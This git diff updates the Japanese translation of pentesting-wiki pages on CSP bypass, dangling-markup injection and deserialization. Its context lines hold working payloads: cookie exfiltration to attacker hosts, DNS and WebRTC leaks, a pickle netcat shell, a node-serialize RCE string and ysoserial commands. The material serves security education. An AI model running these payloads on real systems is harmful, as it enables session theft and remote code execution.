+PHPはデフォルトで**4096**バイトまでレスポンスを**バッファリング**することで知られています。したがって、PHPが警告を表示している場合、**警告内に十分なデータを提供することで**、**レスポンス**は**CSPヘッダーの前に送信され**、ヘッダーが無視されることになります。\
 この技術は基本的に**警告でレスポンスバッファを埋める**ことにより、CSPヘッダーが送信されないようにすることです。
 
-Idea from [**this writeup**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).
+[**この書き込み**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points)からのアイデア。
 
 ### エラーページの書き換え
 
-[**このwriteup**](https://blog.ssrf.kr/69)によると、エラーページ（CSPがない可能性がある）を読み込み、その内容を書き換えることでCSP保護をバイパスすることが可能だったようです。
+[**この書き込み**](https://blog.ssrf.kr/69)によると、エラーページ（CSPがない可能性がある）を読み込み、その内容を書き換えることでCSP保護をバイパスすることが可能だったようです。
 ```javascript
 a = window.open("/" + "x".repeat(4100))
 setTimeout(function () {
@@ -619,15 +619,15 @@ a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0le
 ```
 ### SOME + 'self' + wordpress
 
-SOMEは、ページのエンドポイントでXSS（または非常に制限されたXSS）を悪用して、**同じオリジンの他のエンドポイントを悪用する**技術です。これは、攻撃者のページから脆弱なエンドポイントを読み込み、その後、悪用したい同じオリジンの実際のエンドポイントに攻撃者のページをリフレッシュすることで行われます。この方法で、**脆弱なエンドポイント**は、**ペイロード**内の**`opener`**オブジェクトを使用して、**悪用する実際のエンドポイントのDOM**にアクセスできます。詳細については、次を確認してください：
+SOMEは、**ページのエンドポイント**でXSS（または非常に制限されたXSS）を悪用して、**同じオリジンの他のエンドポイントを悪用する**技術です。これは、攻撃者のページから脆弱なエンドポイントを読み込み、その後、悪用したい同じオリジンの実際のエンドポイントに攻撃者のページをリフレッシュすることで行われます。この方法で、**脆弱なエンドポイント**は、**ペイロード**内の**`opener`**オブジェクトを使用して、**悪用する実際のエンドポイントのDOM**に**アクセス**できます。詳細については、次を確認してください：
 
 {{#ref}}
 ../xss-cross-site-scripting/some-same-origin-method-execution.md
 {{#endref}}
 
-さらに、**wordpress**には`/wp-json/wp/v2/users/1?_jsonp=data`に**JSONP**エンドポイントがあり、出力に送信された**データ**を**反映**します（文字、数字、ドットのみの制限があります）。
+さらに、**wordpress**には、`/wp-json/wp/v2/users/1?_jsonp=data`に**JSONP**エンドポイントがあり、出力に送信された**データ**を**反映**します（文字、数字、ドットのみの制限があります）。
 
-攻撃者はそのエンドポイントを悪用して、WordPressに対して**SOME攻撃を生成**し、`<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>`内に**埋め込む**ことができます。この**スクリプト**は、**'self'によって許可されているため、**読み込まれます。さらに、WordPressがインストールされているため、攻撃者は**CSPをバイパスする**脆弱な**コールバック**エンドポイントを通じて**SOME攻撃を悪用**し、ユーザーにより多くの権限を与えたり、新しいプラグインをインストールしたりすることができます...\
+攻撃者は、そのエンドポイントを悪用して、WordPressに対して**SOME攻撃を生成**し、`<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>`内に**埋め込む**ことができます。この**スクリプト**は、**'self'によって許可されているため、**ロードされます。さらに、WordPressがインストールされているため、攻撃者は**CSPをバイパスする**脆弱な**コールバック**エンドポイントを通じて**SOME攻撃を悪用**し、ユーザーにより多くの権限を与えたり、新しいプラグインをインストールしたりすることができます...\
 この攻撃を実行する方法の詳細については、[https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)を確認してください。
 
 ## CSP Exfiltration Bypasses
@@ -652,7 +652,7 @@ document.location = "https://attacker.com/?" + sessionid
 ページをより速く読み込むために、ブラウザはホスト名をIPアドレスに事前解決し、後で使用するためにキャッシュします。\
 ブラウザにホスト名を事前解決させるには、次のように指定できます: `<link rel="dns-prefetch" href="something.com">`
 
-この動作を悪用して、**DNSリクエストを介して機密情報を流出させる**ことができます:
+この動作を悪用して、**DNSリクエストを介して機密情報を漏洩させる**ことができます:
 ```javascript
 var sessionid = document.cookie.split("=")[1] + "."
 var body = document.getElementsByTagName("body")[0]
@@ -678,9 +678,9 @@ X-DNS-Prefetch-Control: off
 
 ### WebRTC
 
-いくつかのページで、**WebRTCはCSPの`connect-src`ポリシーをチェックしない**と読めます。
+いくつかのページで、**WebRTCはCSPの`connect-src`ポリシーをチェックしない**と記載されています。
 
-実際、_DNSリクエスト_を使用して情報を_リーク_することができます。このコードを確認してください:
+実際、_DNSリクエスト_を使用して情報を_リーク_することができます。このコードを確認してください：
 ```javascript
 ;(async () => {
 p = new RTCPeerConnection({ iceServers: [{ urls: "stun:LEAK.dnsbin" }] })
diff --git a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
index e3e05f307..7e37e75a1 100644
--- a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
@@ -17,7 +17,7 @@ script = document.createElement("script")
 script.src = "//example.com/csp.js"
 window.frames[0].document.head.appendChild(script)
 ```
-### エラー経由
+### エラーを通じて
 
 同様に、テキストファイルや画像のようなエラー応答は、通常CSPヘッダーなしで提供され、X-Frame-Optionsを省略することがあります。エラーはiframe内で読み込むように誘発でき、次のアクションを可能にします：
 ```javascript
diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
index 26d84e6c0..352cd4641 100644
--- a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
+++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
@@ -5,9 +5,9 @@
 ## 概要
 
 この技術は、**HTMLインジェクションが見つかった場合**にユーザーから情報を抽出するために使用できます。これは、**[**XSS**](../xss-cross-site-scripting/)を悪用する方法が見つからない場合**に非常に便利で、**いくつかのHTMLタグを注入できる**場合に役立ちます。\
-また、HTML内に**秘密が平文で保存されている**場合に、それをクライアントから**エクスフィルトレート**したり、スクリプトの実行を誤解させたりするのにも役立ちます。
+また、**秘密がHTML内に平文で保存されている**場合に、それをクライアントから**エクスフィルトレート**したり、スクリプトの実行を誤解させたりするのにも役立ちます。
 
-ここでコメントされた複数の技術は、情報を予期しない方法（htmlタグ、CSS、httpメタタグ、フォーム、baseなど）でエクスフィルトレートすることによって、いくつかの**コンテンツセキュリティポリシー**を回避するために使用できます。
+ここでコメントされているいくつかの技術は、情報を予期しない方法（HTMLタグ、CSS、HTTPメタタグ、フォーム、ベースなど）でエクスフィルトレートすることによって、いくつかの[**コンテンツセキュリティポリシー**](../content-security-policy-csp-bypass/)を回避するために使用できます。
 
 ## 主なアプリケーション
 
@@ -21,7 +21,7 @@
 <meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
 <meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
 ```
-注意してください、**Chromeは"<"または"\n"を含むHTTP URLをブロックします**。そのため、"ftp"のような他のプロトコルスキームを試すことができます。
+注意してください **Chromeは"<"または"\n"を含むHTTP URLをブロックします** ので、"ftp"のような他のプロトコルスキームを試すことができます。
 
 また、CSS `@import`を悪用することもできます（";"が見つかるまで全てのコードを送信します）。
 ```html
@@ -32,7 +32,7 @@
 ```html
 <table background='//your-collaborator-id.burpcollaborator.net?'
 ```
-`<base` タグを挿入することもできます。すべての情報は引用が閉じられるまで送信されますが、いくつかのユーザー操作が必要です（ユーザーはリンクをクリックする必要があります。なぜなら、base タグがリンクが指すドメインを変更するからです）：
+`<base` タグを挿入することもできます。すべての情報は引用が閉じられるまで送信されますが、いくつかのユーザー操作が必要です（ユーザーはリンクをクリックする必要があります。なぜなら、base タグがリンクによって指されるドメインを変更するからです）。
 ```html
 <base target='        <--- Injected
 steal me'<b>test</b>
@@ -49,7 +49,7 @@ steal me'<b>test</b>
 
 ### フォームの盗難 3
 
-ボタンは、属性 "formaction" を使用して、フォームの情報が送信されるURLを変更できます：
+ボタンは、属性 "formaction" を使用して、フォームの情報が送信されるURLを変更できます。
 ```html
 <button name="xss" type="submit" formaction="https://google.com">
 I get consumed!
@@ -57,7 +57,7 @@ I get consumed!
 ```
 攻撃者はこれを使用して情報を盗むことができます。
 
-この攻撃の[**例をこの文書で見つけてください**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)。
+[**この攻撃の例をこの文書で見つけてください**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)。
 
 ### プレーンテキストの秘密を盗む 2
 
@@ -73,7 +73,7 @@ I get consumed!
 ```
 ### フォームパラメータインジェクション
 
-フォームのパスを変更し、新しい値を挿入することで、予期しないアクションが実行されるようにできます：
+フォームのパスを変更し、新しい値を挿入することで、予期しないアクションが実行されるようになります：
 ```html
 <form action="/change_settings.php">
 <input type="hidden" name="invite_user" value="fredmbogo" /> ← Injected lines
@@ -101,8 +101,8 @@ I get consumed!
 <a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
 <base target='
 ```
-注意してください、あなたは**犠牲者**に**リンクをクリック**させ、そのリンクが**あなたが制御するペイロード**に**リダイレクト**するようにします。また、**`base`**タグ内の**`target`**属性は次の単一引用符までの**HTMLコンテンツ**を含むことに注意してください。\
-これにより、リンクがクリックされた場合の**`window.name`**の**値**はすべてその**HTMLコンテンツ**になります。したがって、あなたがリンクをクリックすることで犠牲者がアクセスしているページを**制御**しているため、その**`window.name`**にアクセスしてそのデータを**抽出**することができます。
+注意してください、あなたは**犠牲者**に**リンクをクリック**させ、そのリンクが**ペイロード**にリダイレクトされるようにします。また、**`base`**タグ内の**`target`**属性は次の単一引用符までの**HTMLコンテンツ**を含むことに注意してください。\
+これにより、リンクがクリックされた場合の**`window.name`**の**値**はすべてその**HTMLコンテンツ**になります。したがって、あなたがリンクをクリックすることで犠牲者がアクセスしているページを**制御**しているため、その**`window.name`**にアクセスし、そのデータを**抽出**することができます。
 ```html
 <script>
 if(window.name) {
@@ -111,7 +111,7 @@ new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponen
 ```
 ### 誤解を招くスクリプトワークフロー 1 - HTML 名前空間攻撃
 
-HTML内に新しいタグを挿入し、次のタグを上書きするidを持たせ、スクリプトの流れに影響を与える値を設定します。この例では、情報が誰と共有されるかを選択しています：
+HTML 内に新しいタグを挿入し、次のタグを上書きする id を持たせ、スクリプトの流れに影響を与える値を設定します。この例では、情報が誰と共有されるかを選択しています：
 ```html
 <input type="hidden" id="share_with" value="fredmbogo" /> ← Injected markup ...
 Share this status update with: ← Legitimate optional element of a dialog
@@ -122,7 +122,7 @@ document.getElementById('share_with').value; ... }
 ```
 ### 誤解を招くスクリプトワークフロー 2 - スクリプトネームスペース攻撃
 
-HTMLタグを挿入することで、javascriptネームスペース内に変数を作成します。次に、この変数がアプリケーションのフローに影響を与えます：
+HTMLタグを挿入することで、JavaScriptネームスペース内に変数を作成します。次に、この変数がアプリケーションのフローに影響を与えます：
 ```html
 <img id="is_public" /> ← Injected markup ... // Legitimate application code
 follows function retrieve_acls() { ... if (response.access_mode == AM_PUBLIC) ←
@@ -150,7 +150,7 @@ set_sharing({ ... })
 ```
 ### Iframeの悪用
 
-子文書は、クロスオリジンの状況でも親の`location`プロパティを表示および変更する能力を持っています。これにより、クライアントを任意のページにリダイレクトできる**iframe**内にスクリプトを埋め込むことが可能になります：
+子ドキュメントは、クロスオリジンの状況でも親の`location`プロパティを表示および変更する能力を持っています。これにより、クライアントを任意のページにリダイレクトできる**iframe**内にスクリプトを埋め込むことが可能になります：
 ```html
 <html>
 <head></head>
@@ -180,14 +180,14 @@ For more info check [https://portswigger.net/research/bypassing-csp-with-danglin
 
 ### \<meta abuse
 
-**`meta http-equiv`** を使用して、Cookieを設定するなどの**いくつかのアクション**を実行できます: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` またはリダイレクトを実行することができます（この場合は5秒後）: `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
+**`meta http-equiv`** を使用して、Cookieを設定するなどの **いくつかのアクション** を実行できます: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` またはリダイレクトを実行することができます（この場合は5秒後）: `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
 
-これは、**http-equiv** に関する **CSP** で**回避**できます（ `Content-Security-Policy: default-src 'self';` または `Content-Security-Policy: http-equiv 'self';`）
+これは **http-equiv** に関する **CSP** で **回避** できます（ `Content-Security-Policy: default-src 'self';` または `Content-Security-Policy: http-equiv 'self';`）
 
 ### New \<portal HTML tag
 
-\<portal タグの脆弱性に関する非常に**興味深い研究**を[こちら](https://research.securitum.com/security-analysis-of-portal-element/)で見つけることができます。\
-この文書を書いている時点では、`chrome://flags/#enable-portals` でポータルタグを有効にする必要があります。そうしないと機能しません。
+\<portal タグの脆弱性に関する非常に **興味深い研究** を [こちら](https://research.securitum.com/security-analysis-of-portal-element/) で見つけることができます。\
+この文を書いている時点では、`chrome://flags/#enable-portals` でポータルタグを有効にする必要があります。そうしないと機能しません。
 ```html
 <portal src='https://attacker-server?
 ```
@@ -197,7 +197,7 @@ HTMLにおける接続漏洩のすべての方法がDangling Markupに役立つ
 
 ## SS-Leaks
 
-これは**dangling markupとXS-Leaksの** **ミックス**です。一方で、この脆弱性は**同じオリジン**のページに**HTMLを注入**することを可能にしますが、他方で、**HTMLを注入**できるページを直接**攻撃**するのではなく、**別のページ**を攻撃します。
+これは**dangling markupとXS-Leaksの** **ミックス**です。一方で、この脆弱性は**同じオリジン**のページに**HTMLを注入**することを可能にしますが（JSではありません）、他方で、**HTMLを注入**できるページを直接**攻撃**するのではなく、**別のページ**を攻撃します。
 
 {{#ref}}
 ss-leaks.md
diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md
index 1589e811f..2d562c812 100644
--- a/src/pentesting-web/deserialization/README.md
+++ b/src/pentesting-web/deserialization/README.md
@@ -8,17 +8,17 @@
 
 **デシリアライズ**は、逆にシリアライズに対抗するプロセスです。特定の形式で構造化されたデータを取り、それをオブジェクトに再構築することを含みます。
 
-デシリアライズは危険な場合があります。なぜなら、**攻撃者がシリアライズされたデータを操作して有害なコードを実行させたり、オブジェクト再構築プロセス中にアプリケーションに予期しない動作を引き起こす可能性があるからです**。
+デシリアライズは危険である可能性があります。なぜなら、**攻撃者がシリアライズされたデータを操作して有害なコードを実行させたり、オブジェクト再構築プロセス中にアプリケーションに予期しない動作を引き起こすことを許す可能性があるからです。**
 
 ## PHP
 
 PHPでは、シリアライズおよびデシリアライズプロセス中に特定のマジックメソッドが利用されます：
 
-- `__sleep`: オブジェクトがシリアライズされるときに呼び出されます。このメソッドは、シリアライズすべきオブジェクトのすべてのプロパティの名前の配列を返す必要があります。保留中のデータをコミットしたり、同様のクリーンアップタスクを実行するために一般的に使用されます。
+- `__sleep`: オブジェクトがシリアライズされるときに呼び出されます。このメソッドは、シリアライズされるべきオブジェクトのすべてのプロパティの名前の配列を返す必要があります。保留中のデータをコミットしたり、同様のクリーンアップタスクを実行するために一般的に使用されます。
 - `__wakeup`: オブジェクトがデシリアライズされるときに呼び出されます。シリアライズ中に失われた可能性のあるデータベース接続を再確立し、他の再初期化タスクを実行するために使用されます。
-- `__unserialize`: このメソッドは、オブジェクトがデシリアライズされるときに`__wakeup`の代わりに呼び出されます。`__wakeup`に比べてデシリアライズプロセスに対するより多くの制御を提供します。
+- `__unserialize`: このメソッドは、オブジェクトがデシリアライズされるときに`__wakeup`の代わりに呼び出されます。`__wakeup`に比べてデシリアライズプロセスに対する制御が強化されます。
 - `__destruct`: このメソッドは、オブジェクトが破棄される直前またはスクリプトが終了するときに呼び出されます。通常、ファイルハンドルやデータベース接続を閉じるなどのクリーンアップタスクに使用されます。
-- `__toString`: このメソッドは、オブジェクトを文字列として扱うことを可能にします。ファイルを読み取るためや、その中の関数呼び出しに基づいて他のタスクを実行するために使用でき、オブジェクトのテキスト表現を効果的に提供します。
+- `__toString`: このメソッドは、オブジェクトを文字列として扱うことを可能にします。ファイルを読み取ったり、その中の関数呼び出しに基づいて他のタスクを実行するために使用でき、オブジェクトのテキスト表現を効果的に提供します。
 ```php
 <?php
 class test {
@@ -90,11 +90,11 @@ This is a test<br />
 > }
 > ```
 
-説明された **PHPの例をこちらで読むことができます**: [https://www.notsosecure.com/remote-code-execution-via-php-unserialize/](https://www.notsosecure.com/remote-code-execution-via-php-unserialize/)、こちら [https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) またはこちら [https://securitycafe.ro/2015/01/05/understanding-php-object-injection/](https://securitycafe.ro/2015/01/05/understanding-php-object-injection/)
+説明された **PHPの例をここで読むことができます**: [https://www.notsosecure.com/remote-code-execution-via-php-unserialize/](https://www.notsosecure.com/remote-code-execution-via-php-unserialize/)、ここ [https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) またはここ [https://securitycafe.ro/2015/01/05/understanding-php-object-injection/](https://securitycafe.ro/2015/01/05/understanding-php-object-injection/)
 
 ### PHP Deserial + Autoload Classes
 
-PHPのオートロード機能を悪用して、任意のphpファイルを読み込むことができます。
+PHPのオートロード機能を悪用して、任意のPHPファイルを読み込むことができます。
 
 {{#ref}}
 php-deserialization-+-autoload-classes.md
@@ -119,7 +119,7 @@ $ser=serialize($o);
 
 [**PHPGGC**](https://github.com/ambionics/phpggc) は、PHP のデシリアライズを悪用するためのペイロードを生成するのに役立ちます。\
 アプリケーションのソースコード内でデシリアライズを悪用する方法を見つけられない場合もありますが、**外部 PHP 拡張のコードを悪用できるかもしれません。**\
-ですので、可能であればサーバーの `phpinfo()` を確認し、**インターネットで検索**（さらには **PHPGGC** の **gadgets** も）して、悪用できる可能性のあるガジェットを探してください。
+ですので、可能であれば、サーバーの `phpinfo()` を確認し、**インターネットで検索**（さらには **PHPGGC** の **gadgets** も）して、悪用できる可能性のあるガジェットを探してください。
 
 ### phar:// メタデータデシリアライズ
 
@@ -143,9 +143,9 @@ def __reduce__(self):
 return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
 print(base64.b64encode(pickle.dumps(P())))
 ```
-`print(base64.b64encode(pickle.dumps(P(),2)))`を使用して、Python3を実行している場合にPython2と互換性のあるオブジェクトを生成する前に、バイパステクニックを確認してください。
+`print(base64.b64encode(pickle.dumps(P(),2)))`を使用して、python3を実行している場合にpython2と互換性のあるオブジェクトを生成する前に、バイパステクニックを確認してください。
 
-**pickle jails**からの脱出に関する詳細情報は、以下を確認してください：
+**pickle jail**からの脱出に関する詳細情報は、以下を確認してください：
 
 {{#ref}}
 ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/
@@ -153,7 +153,7 @@ print(base64.b64encode(pickle.dumps(P())))
 
 ### Yaml **&** jsonpickle
 
-以下のページでは、Pythonライブラリの**安全でないデシリアライズを悪用する技術**を紹介し、**Pickle, PyYAML, jsonpickle, ruamel.yaml**のためのRCEデシリアライズペイロードを生成するために使用できるツールで締めくくっています：
+以下のページでは、**yamlの安全でないデシリアライズを悪用する技術**を紹介し、**Pickle, PyYAML, jsonpickle, ruamel.yaml**のためのRCEデシリアライズペイロードを生成するために使用できるツールで締めくくっています：
 
 {{#ref}}
 python-yaml-deserialization.md
@@ -170,7 +170,7 @@ python-yaml-deserialization.md
 ### JSマジック関数
 
 JSは、オブジェクトを作成するためだけに実行される**"マジック"関数**を持っていませんが、**`toString`**、**`valueOf`**、**`toJSON`**のように、**直接呼び出さなくても頻繁に使用される関数**があります。\
-デシリアライズを悪用する場合、これらの関数を**妥協して他のコードを実行**させることができれば、呼び出されたときに任意のコードを実行することができます。
+デシリアライズを悪用する場合、これらの関数を**妥協して他のコードを実行**させることができれば、呼び出されたときに任意のコードを実行できます。
 
 関数を直接呼び出さずに**"マジック"な方法**で呼び出すもう一つの方法は、**非同期関数**（プロミス）によって返されるオブジェクトを**妥協する**ことです。なぜなら、その**返されるオブジェクト**を**"then"という関数型のプロパティ**を持つ別の**プロミス**に**変換**すると、別のプロミスによって返されるだけで**実行される**からです。_詳細については_ [_**このリンク**_](https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/) _を参照してください。_
 ```javascript
@@ -223,7 +223,7 @@ console.log("Serialized: \n" + payload_serialized)
 ```bash
 {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}
 ```
-例では、関数がシリアライズされると、`_$$ND_FUNC$$_` フラグがシリアライズされたオブジェクトに追加されることがわかります。
+関数がシリアライズされると、シリアライズされたオブジェクトに `_$$ND_FUNC$$_` フラグが追加されることが例からわかります。
 
 ファイル `node-serialize/lib/serialize.js` 内には、同じフラグとそのコードの使用方法が見つかります。
 
@@ -231,10 +231,10 @@ console.log("Serialized: \n" + payload_serialized)
 
 ![](<../../images/image (446).png>)
 
-最後のコードのチャンクでわかるように、**フラグが見つかった場合**、`eval` が関数をデシリアライズするために使用されるので、基本的に **ユーザー入力が `eval` 関数内で使用されている**ことになります。
+最後のコードのチャンクでわかるように、**フラグが見つかった場合**、`eval` が使用されて関数がデシリアライズされるため、基本的に **ユーザー入力が `eval` 関数内で使用されている**ことになります。
 
-しかし、**関数をシリアライズするだけでは**、それを**実行することはありません**。なぜなら、コードの一部が**`y.rce`を呼び出す必要がある**からで、これは非常に**ありそうにありません**。\
-それでも、**シリアライズされたオブジェクトを修正して**、**いくつかの括弧を追加する**ことで、オブジェクトがデシリアライズされるときにシリアライズされた関数を自動的に実行させることができます。\
+しかし、**関数をシリアライズするだけでは**それを**実行することはありません**。なぜなら、コードの一部が**`y.rce`を呼び出す必要がある**からで、これは非常に**ありそうにありません**。\
+それでも、シリアライズされたオブジェクトを**修正して**、**いくつかの括弧を追加する**ことで、オブジェクトがデシリアライズされるときにシリアライズされた関数を自動的に実行させることができます。\
 次のコードのチャンクでは、**最後の括弧**と、`unserialize` 関数がどのように自動的にコードを実行するかに注意してください：
 ```javascript
 var serialize = require("node-serialize")
@@ -278,11 +278,11 @@ __js_function:
 }
 funcster.deepDeserialize(desertest3)
 ```
-**詳細については、[このソースを読む](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**。
+**詳細については、[このソースを読む](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**。**
 
 ### [**serialize-javascript**](https://www.npmjs.com/package/serialize-javascript)
 
-**serialize-javascript**パッケージは、シリアル化専用に設計されており、組み込みのデシリアル化機能はありません。ユーザーはデシリアル化のための独自のメソッドを実装する責任があります。シリアル化されたデータをデシリアル化するための公式の例では、`eval`の直接使用が推奨されています：
+**serialize-javascript** パッケージは、シリアル化専用に設計されており、組み込みのデシリアル化機能はありません。ユーザーはデシリアル化のための独自のメソッドを実装する責任があります。シリアル化されたデータをデシリアル化するための公式の例では、`eval` の直接使用が推奨されています：
 ```javascript
 function deserialize(serializedJavascript) {
 return eval("(" + serializedJavascript + ")")
@@ -357,26 +357,26 @@ javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAA
 find . -iname "*commons*collection*"
 grep -R InvokeTransformer .
 ```
-あなたは、**脆弱性が知られているすべてのライブラリ**を確認し、[**Ysoserial**](https://github.com/frohoff/ysoserial)がエクスプロイトを提供できるかどうかを試すことができます。また、[Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json)に示されているライブラリを確認することもできます。\
-さらに、[**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector)を使用して、エクスプロイト可能な可能性のあるガジェットチェーンを検索することもできます。\
-**gadgetinspector**を実行する際（ビルド後）は、発生する多数の警告/エラーを気にせず、完了するまで待ってください。すべての結果は_gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_に書き込まれます。**gadgetinspectorはエクスプロイトを作成せず、偽陽性を示す可能性があることに注意してください**。
+あなたは、**脆弱性が知られているすべてのライブラリを確認し**、[**Ysoserial**](https://github.com/frohoff/ysoserial)がエクスプロイトを提供できるかどうかを試すことができます。または、[Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json)に示されているライブラリを確認することもできます。\
+さらに、[**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector)を使用して、エクスプロイト可能なガジェットチェーンを検索することもできます。\
+**gadgetinspector**を実行する際（ビルド後）、発生する多数の警告/エラーを気にせず、完了するまで待ってください。すべての結果は_gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_に書き込まれます。**gadgetinspectorはエクスプロイトを作成せず、偽陽性を示す可能性があることに注意してください**。
 
 #### ブラックボックステスト
 
-Burp拡張機能[**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md)を使用すると、**どのライブラリが利用可能か**（バージョンも含む）を特定できます。この情報を使用すると、脆弱性をエクスプロイトするための**ペイロードを選択しやすく**なります。\
+Burp拡張機能[**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md)を使用すると、**どのライブラリが利用可能か**（バージョンも含む）を特定できます。この情報をもとに、脆弱性をエクスプロイトするための**ペイロードを選択しやすくなる**かもしれません。\
 [**GadgetProbeについて詳しく学ぶにはこちらをお読みください**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**。**\
-GadgetProbeは**`ObjectInputStream`のデシリアライズ**に焦点を当てています。
+GadgetProbeは**`ObjectInputStream`デシリアライズ**に焦点を当てています。
 
 Burp拡張機能[**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)を使用すると、**ysoserialでエクスプロイト可能な脆弱なライブラリを特定**し、それらを**エクスプロイト**できます。\
 [**Java Deserialization Scannerについて詳しく学ぶにはこちらをお読みください。**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)\
-Java Deserialization Scannerは**`ObjectInputStream`**のデシリアライズに焦点を当てています。
+Java Deserialization Scannerは**`ObjectInputStream`**デシリアライズに焦点を当てています。
 
-[**Freddy**](https://github.com/nccgroup/freddy)を使用して、**Burp**内の**デシリアライズ**脆弱性を**検出**することもできます。このプラグインは、**`ObjectInputStream`**に関連する脆弱性だけでなく、**Json**および**Yml**デシリアライズライブラリからの脆弱性も検出します。アクティブモードでは、スリープまたはDNSペイロードを使用してそれらを確認しようとします。\
+[**Freddy**](https://github.com/nccgroup/freddy)を使用して、**Burp**内の**デシリアライズ**脆弱性を**検出**することもできます。このプラグインは、**`ObjectInputStream`**関連の脆弱性だけでなく、**Json**および**Yml**デシリアライズライブラリの脆弱性も検出します。アクティブモードでは、スリープまたはDNSペイロードを使用して確認を試みます。\
 [**Freddyについての詳細情報はこちらで確認できます。**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/)
 
 **シリアライズテスト**
 
-サーバーによって使用されている脆弱なライブラリを確認するだけではありません。時には、**シリアライズされたオブジェクト内のデータを変更していくつかのチェックをバイパスする**ことができるかもしれません（ウェブアプリ内で管理者権限を付与するかもしれません）。\
+サーバーが使用している脆弱なライブラリを確認するだけではありません。時には、**シリアライズされたオブジェクト内のデータを変更して、いくつかのチェックをバイパスすることができるかもしれません**（ウェブアプリ内で管理者権限を付与するかもしれません）。\
 ウェブアプリケーションに送信されるJavaシリアライズオブジェクトを見つけた場合、**[**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper)を使用して、送信されるシリアライズオブジェクトをより人間が読みやすい形式で印刷することができます**。送信しているデータを知ることで、それを変更していくつかのチェックをバイパスするのが容易になります。
 
 ### **エクスプロイト**
@@ -385,7 +385,7 @@ Java Deserialization Scannerは**`ObjectInputStream`**のデシリアライズ
 
 Javaデシリアライズをエクスプロイトするための主なツールは[**ysoserial**](https://github.com/frohoff/ysoserial)です（[**こちらからダウンロード**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)）。また、複雑なコマンド（例えばパイプを使用）を使用できる[**ysoseral-modified**](https://github.com/pimps/ysoserial-modified)の使用も検討できます。\
 このツールは**`ObjectInputStream`**のエクスプロイトに**焦点を当てている**ことに注意してください。\
-私は**RCEペイロードの前に「URLDNS」**ペイロードを使用して、注入が可能かどうかをテストすることを**お勧めします**。いずれにせよ、「URLDNS」ペイロードが機能しない場合でも、他のRCEペイロードが機能する可能性があることに注意してください。
+**RCE**ペイロードの前に**"URLDNS"**ペイロードを使用して、注入が可能かどうかをテストすることを**お勧めします**。いずれにせよ、"URLDNS"ペイロードが機能しない場合でも、他のRCEペイロードが機能する可能性があることに注意してください。
 ```bash
 # PoC to make the application perform a DNS req
 java -jar ysoserial-master-SNAPSHOT.jar URLDNS http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload
@@ -430,7 +430,7 @@ java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb
 # Base64 encode payload in base64
 base64 -w0 payload
 ```
